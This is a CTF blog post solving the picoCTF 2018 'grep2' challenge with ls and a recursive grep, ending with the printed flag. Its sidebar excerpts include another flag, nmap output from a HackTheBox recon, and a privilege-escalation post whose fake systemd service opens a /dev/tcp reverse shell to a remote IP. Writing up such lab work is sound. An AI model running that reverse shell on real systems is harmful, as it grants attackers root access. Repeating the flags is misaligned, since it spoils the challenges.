Skip to main content

PicoCTF2018 - Miscellaneous - grep2

PicoCTF2018 - Miscellaneous - grep2

Objective:
This one is a little bit harder. Can you find the flag in /problems/grep-2_0_783d3e2c8ea2ebd3799ca6a5d28fc742/files on the shell server? Remember, grep is your friend.


Solution:

@pico-2018-shell:~$ cd /problems/grep-2_0_783d3e2c8ea2ebd3799ca6a5d28fc742

@pico-2018-shell:/problems/grep-2_0_783d3e2c8ea2ebd3799ca6a5d28fc742$ ls -l                                 
total 4
drwxr-xr-x 12 root root 4096 Mar 25 19:18 files


cool so there is a folder name files lets see what's inside

cd files
@pico-2018-shell:/problems/grep-2_0_783d3e2c8ea2ebd3799ca6a5d28fc742/files$ ls -l
total 40
drwxr-xr-x 2 root root 4096 Mar 25 19:18 files0
drwxr-xr-x 2 root root 4096 Mar 25 19:18 files1
drwxr-xr-x 2 root root 4096 Mar 25 19:18 files2
drwxr-xr-x 2 root root 4096 Mar 25 19:18 files3
drwxr-xr-x 2 root root 4096 Mar 25 19:18 files4
drwxr-xr-x 2 root root 4096 Mar 25 19:18 files5
drwxr-xr-x 2 root root 4096 Mar 25 19:18 files6
drwxr-xr-x 2 root root 4096 Mar 25 19:18 files7
drwxr-xr-x 2 root root 4096 Mar 25 19:18 files8
drwxr-xr-x 2 root root 4096 Mar 25 19:18 files9


ok more folders let's check one out

@pico-2018-shell:/problems/grep-2_0_783d3e2c8ea2ebd3799ca6a5d28fc742/files$ cd files0
@pico-2018-shell:/problems/grep-2_0_783d3e2c8ea2ebd3799ca6a5d28fc742/files/files0$ ls
file0  file10  file12  file14  file16  file18  file2   file21  file23  file25  file27  file29  file4  file6  file8
file1  file11  file13  file15  file17  file19  file20  file22  file24  file26  file28  file3   file5  file7  file9


ok so it has a bunch of files in it

Our goal is to find the flag inside one of these files inside one of these folders


Let's use Grep to find out which file contains the string 'pico'

@pico-2018-shell:/problems/grep-2_0_783d3e2c8ea2ebd3799ca6a5d28fc742/files$ grep -rl 'pico'
files5/file23



okay it looks like file23 in the files5 folder has that string lets cat and grep and for the flag


@pico-2018-shell:/problems/grep-2_0_783d3e2c8ea2ebd3799ca6a5d28fc742/files$ cat ./files5/file23 | grep 'pico'
picoCTF{grep_r_and_you_will_find_24c911ab}






Labels:

Comments

Post a Comment

Popular posts from this blog

RingZero CTF - Forensics - Who am I part 2

RingZero CTF - Forensics -  Who am I part 2 Objective: I'm the proud owner of this website. Can you verify that? Solution: Well it took me a bit to figure this one out. I tried looking at the whois records for ringzer0ctf.com I tired looking at the DNS records for the site. I even looked in the Certificate for the site. Then I thought a little be more about the question. It's not asking how I can verify who own the site. It wants me to verify the owner themselves. Luckily at the bottom the page we see who is listed as on the twittter feeds @ringzer0CTF and @ MrUnik0d3r lets check if we can find the PGP for MrUniK0d3r online. I googled PGP and MrUn1k0d3r The very first result is his PGP  keybase.txt with his PGP at the bottom of the file is the flag FLAG-7A7i0V2438xL95z2X2Z321p30D8T433Z
Post a Comment
Read more

Abusing systemctl SUID for reverse shell

Today I came across a box that had the SUID set for systemctl connected as the apache user www-data I was able to get a root reverse shell. This is to document how to use this for privilege escalation. I used a bit from this blog https://carvesystems.com/news/contest-exploiting-misconfigured-sudo/ and a bit from here too https://hosakacorp.net/p/systemd-user.html Step1. Create a fake service I named my LegitService.service I placed it in the /tmp directory on the server. [Unit] UNIT=LegitService Description=Black magic happening, avert your eyes [Service] RemainAfterExit=yes Type=simple ExecStart=/bin/bash -c "exec 5<>/dev/tcp/10.2.21.243/5555; cat <&5 | while read line; do $line 2>&5 >&5; done" [Install] WantedBy=default.target Then in order to add this to a place we can use systemctl to call from I created a link from /tmp, since I didn't have permission to put the file in the normal systemd folders systemctl link /tmp/LegitService.service The
Post a Comment
Read more

HacktheBox - Retired - Frolic

HacktheBox - Retired - Frolic Recon Let's start out with a threader3000 scan Some interesting results here Port 22 and 445 aren't uncommon… but 1880 and 9999 are.. Let's let nmap run through these ports  Option Selection: 1 nmap -p22,445,1880,9999 -sV -sC -T4 -Pn -oA 10.10.10.111 10.10.10.111 Host discovery disabled (-Pn). All addresses will be marked 'up' and scan times will be slower. Starting Nmap 7.91 ( https://nmap.org ) at 2021-05-05 16:17 EDT Nmap scan report for 10.10.10.111 Host is up (0.060s latency). PORT     STATE SERVICE     VERSION 22/tcp   open  ssh         OpenSSH 7.2p2 Ubuntu 4ubuntu2.4 (Ubuntu Linux; protocol 2.0) | ssh-hostkey: |   2048 87:7b:91:2a:0f:11:b6:57:1e:cb:9f:77:cf:35:e2:21 (RSA) |   256 b7:9b:06:dd:c2:5e:28:44:78:41:1e:67:7d:1e:b7:62 (ECDSA) |_  256 21:cf:16:6d:82:a4:30:c3:c6:9c:d7:38:ba:b5:02:b0 (ED25519) 445/tcp  open  netbios-ssn Samba smbd 4.3.11-Ubuntu (workgroup: WORKGROUP) 1880/tcp open  http        Node.js (Express middlewar
Post a Comment
Read more